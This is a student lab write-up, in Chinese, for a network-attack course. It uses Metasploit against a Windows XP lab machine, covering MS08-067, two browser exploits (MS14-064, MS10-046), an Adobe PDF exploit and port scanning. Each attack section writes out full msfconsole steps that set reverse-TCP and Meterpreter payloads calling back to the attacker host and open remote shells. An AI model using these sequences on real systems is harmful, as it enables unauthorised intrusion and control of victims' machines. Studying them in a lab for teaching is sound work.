2019-2020-2 20175335丹增罗布 《网络对抗技术》Exp6 MSF基础应用

Posted dluob

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了2019-2020-2 20175335丹增罗布 《网络对抗技术》Exp6 MSF基础应用相关的知识,希望对你有一定的参考价值。

2019-2020-2 20175335丹增罗布 《网络对抗技术》Exp6 MSF基础应用

目录:

2019-2020-2 20175335《网络对抗技术》Exp6 MSF基础应用

  • 实践内容
    • 一个主动攻击实践
      • ms08_067
    • 一个针对浏览器的攻击
      • ms14_064
      • ms10_046
    • 一个针对客户端的攻击
      • Adobe
    • 成功应用任何一个辅助模块
      • cert辅助模块(唯一)
      • TCP"XMas"端口扫描(唯一)
  • 实验总结
    • 实验问题回答
    • 实践体会

 

原理与实践说明

实践原理

1、 MSF主要模块:指Metasploit框架中所使用的一段软件代码组件

  • 查看六种模块源码目录/usr/share/metasploit-framework/modules
  • 渗透攻击模块(Exploit Modules)
    • 攻击漏洞,把shellcode"背"过去
    • 针对每一个漏洞,写一段攻击代码
  • 辅助模块(Auxiliary Modules)
    • 在进行渗透攻击之前得到目标系统丰富的情报信息,它是攻击的前提
  • 攻击载荷(Payload Modules)
    • 载荷,一段指令(shellcode),目标系统在被渗透攻击之后去执行的代码
  • 空字段模块(Payload Modules)
  • 编码模块(Payload Modules)
  • 后渗透攻击模块(Payload Modules)

2、 用户操作界面

  • msfconsole
    • 开发部署成本低、兼容性高、方便自动化
    • 指令需要记
  • armitage
    • 点选模块 不用记忆
    • 使用不灵活
  • webgui
    • 跨平台 高效 功能强大

3、 MSF常用漏洞指令

  • search name:用指定关键字搜索可以利用的漏洞模块
  • use exploit name:使用漏洞
  • show options:显示配置选项
  • set option name option:设置选项
  • show payloads:回链攻击载荷
  • show targets: 显示目标(os版本)
  • set TARGET target number:设置目标版本
  • exploit:开始漏洞攻击
  • sessions -l:列出会话
  • sessions -i id:选择会话
  • sessions -k id:结束会话
  • Ctrl+z:把会话放到后台
  • Ctrl+c:结束会话
  • show auxiliary:显示辅助模块
  • use auxiliary name:使用辅助模块
  • set option name option:设置选项
  • exploit:运行模块

基础问题回答

Q:用自己的话解释什么是exploit,payload,encode.

  • exploit是工具,用来连接漏洞,将payload传送到靶机中
  • payload是载荷,是目标系统在被exploit传送之后,去执行的攻击代码
  • encode是编码,用来包装payload,不让杀软轻易发现payload就是攻击代码。

 

Q:离实战还缺些什么技术或步骤?

  • 现在做的实验大多都是针对已经淘汰掉的系统进行的攻击,这些系统的版本已经很久没有更新过了,对他们进行攻击会相对容易一些,还有就是咱们既然可以学习这些攻击技术,那些做软件做系统的也能学到,他们已经对自己的软件和系统做了很多的测试,要想真正的去攻击真的挺难的。

实验内容

任务一:主动攻击实践

如ms08_067

ms08_067_netapi是一款Metasploit中有点老的溢出攻击载荷,攻击可以获得一个相对高的权限。

  • 实现:ms08_067

  • 攻击机:Kali 172.16.135.149

  • 靶机:Windows xp  172.16.135.161

  • payload : generic/shell_reverse_tcp

  • 测试靶机与攻击机之间能否ping通

win xp ping:

技术图片

 

 

 kali ping:

技术图片

 

 

 

  • 攻击者试探靶机是否存在此漏洞nmap -sS -A --script=smb-vuln-ms08-067 -PO 172.16.135.161

技术图片

 

 

  • 查看到靶机存在此漏洞

技术图片

 

 

  • 启动msfconsole,然后输入search ms08_067查找该漏洞使用的攻击模块,攻击模块为exploit/windows/smb/ms08_067_netapi,如下图所示:

技术图片

 

 

  •  输入指令 use exploit/windows/smb/ms08_067_netapi进入攻击模块,使用show payloads,查看能够使用的payloads

技术图片

 

 

  •  使用指令 set payload generic/shell_reverse_tcp 设置payload为反向tcp连接,使用 show options 查看可以设置的参数

技术图片

 

 

  •  设置参数:
set RHOST 172.16.135.161 //设置靶机IP
set LPORT 5335  //设置攻击机端口
set LHOST 172.16.135.149//设置攻击机IP
exploit

技术图片

 

 

  • 回连成功之后输入ipconfig查看信息!

技术图片

 

 

攻击成功! 

技术图片

 

 

  • 输入net user查看Win目前的用户名。

技术图片

 

 

 

一个针对浏览器的攻击

ms14_064

  • 启动msfconsole,然后输入search ms14_064查找该漏洞使用的攻击模块,攻击模块为windows/browser/ms14_064_ole_code_execution,如下图所示:

技术图片

 

 

  •  使用use windows/browser/ms14_064_ole_code_execution设置模块,使用 set payload windows/meterpreter/reverse_tcp 设置payload,使用指令 show options查看要设置的参数

技术图片

 

 

  •  设置参数:
set LHOST 172.16.135.149
set LPORT 5335
set URIPATH 5335dzlb//设置url域名
exploit

技术图片

 

 

  •  在Windows Xp浏览器输入http://172.16.135.149:8080/5335dzlb

技术图片

 

 

技术图片

 

 

  •  用指令sessions查看会话信息。

技术图片

 

 

  •  通过输入sessions -i 1获取第一个会话连接,并输入ipconfig验证是否为靶机地址,使用dir查看文件目录。

技术图片

 

 

 

ms10_046

  • 启动msfconsole,然后输入searchms10_046查找该漏洞使用的攻击模块,攻击模块为exploit/windows/browser/ms10_046_shortcut_icon_dllloader,如下图所示:

技术图片

 

 

 

  • 使用use exploit/windows/browser/ms10_046_shortcut_icon_dllloader设置模块,使用 set payload windows/meterpreter/reverse_tcp 设置payload,使用指令 show options查看要设置的参数。

技术图片

 

 

  • 设置参数:
1 set SRVHOST 172.16.135.149 
2 set LHOST 172.16.135.149
3 exploit 

技术图片

 

 

  • 在windows XP的浏览器中访问刚刚设置的服务器IP http://172.16.135.149弹出如下窗口。

技术图片

 

 

  •  同时攻击者会开始监听并与靶机建立连接。

技术图片

 

 

  •  输入sessions查看有多少主机被反向链接到攻击者和靶机对应的序号。
  • 输入sessions -i 1控制靶机(-i后面的数即为靶机对应的序号),并输入ipconfig查看主机IP地址。

技术图片

 

 

 

一个针对客户端的攻击

Adobe

  • 启动msfconsole,然后输入search adobe查找该漏洞使用的攻击模块,攻击模块为exploit/windows/fileformat/adobe_toolbutton,如下图所示:

技术图片

 

 

  •  使用use exploit/windows/fileformat/adobe_toolbutton设置模块,使用 set payload windows/meterpreter/reverse_tcp 设置payload,使用指令 show options查看要设置的参数。

技术图片

 

 

  •  设置参数:
1 set RHOST 172.16.135.161 //设置靶机IP
2 set LPORT 5335  //设置攻击机端口
3 set LHOST 172.16.135.149 //设置攻击机IP
4 exploit

技术图片

 

 

  • 在linux中另外打开一个终端,msfconsole进入控制台
  • 输入use exploit/multi/handler 使用监听模块,设置payload
  • 使用和生成后门程序时相同的payload:set payload windows/meterpreter/reverse_tcp
  • set LHOST 172.16.135.149
  • 端口号也相同:set LPORT 5335
  • 设置完成后,exploit开始监听

技术图片

 

 

 

  • 靶机中打开msf.pdf文件,靶机上钩,攻击成功。
  • kali中发现回连成功。
  • 输入ipconfig

 技术图片

成功应用任何一个辅助模块

cert辅助模块(唯一)

  • cert的扫描仪模块是一个有用的管理扫描仪,可以覆盖一个子网来检查服务器证书是否过期

  • 输入search cert首先查看辅助模块cert辅助模块的信息

技术图片

 

 

  •  设置参数

 

use auxiliary/scanner/telnet/telnet_version
set RHOSTS 172.16.135.149/24
set THREADS 50
run

技术图片

 

 

  •  

技术图片

  •   

技术图片

 

 TCP"XMas"端口扫描(唯一)

  • 该模块的主要作用是判断端口是开放还是关闭,结果表示端口是开放或者被过滤(屏蔽)的.
  • 输入search xmas首先查看xmas辅助模块的信息

技术图片

 

 

  • 设置参数:
use auxiliary/scanner/portscan/xmas
set RHOST 172.16.135.149
set ports 5335
run

技术图片

 

实验中遇到的问题:

问题1:出现“ Kali linux-Exploit failed [unreachable]:Rex::ConnectionTimeout Could not determine the exact service pack ”等等问题?!

解决办法:(1)靶机windows xp sp3要装英文版。(2)靶机的防火墙一定要关闭。(3)使用ping命令测试两台主机是否可以互联 再次exploit,发现成功!(https://blog.csdn.net/qq_41363459/article/details/105621436

问题2:技术图片

 

解决办法:权限问题! + sudo msfconsole!

实践体会:

  本次实验操作起来较为容易,,因为metasploit攻击漏洞的专一性,所以我在寻找主机上遇到了很多困难。必须要在特定环境和特定触发条件下才能成功。在亲身进行了各个漏洞利用的实践后也更明白了修复漏洞的重要性,需要不断维护系统,保证其处于一个较为安全的环境,通过查阅资料也锻炼了我的自学能力和了解到很多大佬的超级操作!实时羡慕! 也收获到不少知识! 

 

以上是关于2019-2020-2 20175335丹增罗布 《网络对抗技术》Exp6 MSF基础应用的主要内容,如果未能解决你的问题,请参考以下文章

2019-2020-2 20175335丹增罗布《网络对抗技术》Exp8 Web基础

实验三

2019-2020-1 20175304 20175303 20175327 20175335 实验三-并发程序

For循环不起作用?罗布洛克斯工作室

为啥这个 Int Value 在设置后会不断返回? [罗布洛克斯工作室]

如何通过按键盘上的键杀死自己的玩家? (罗布洛克斯)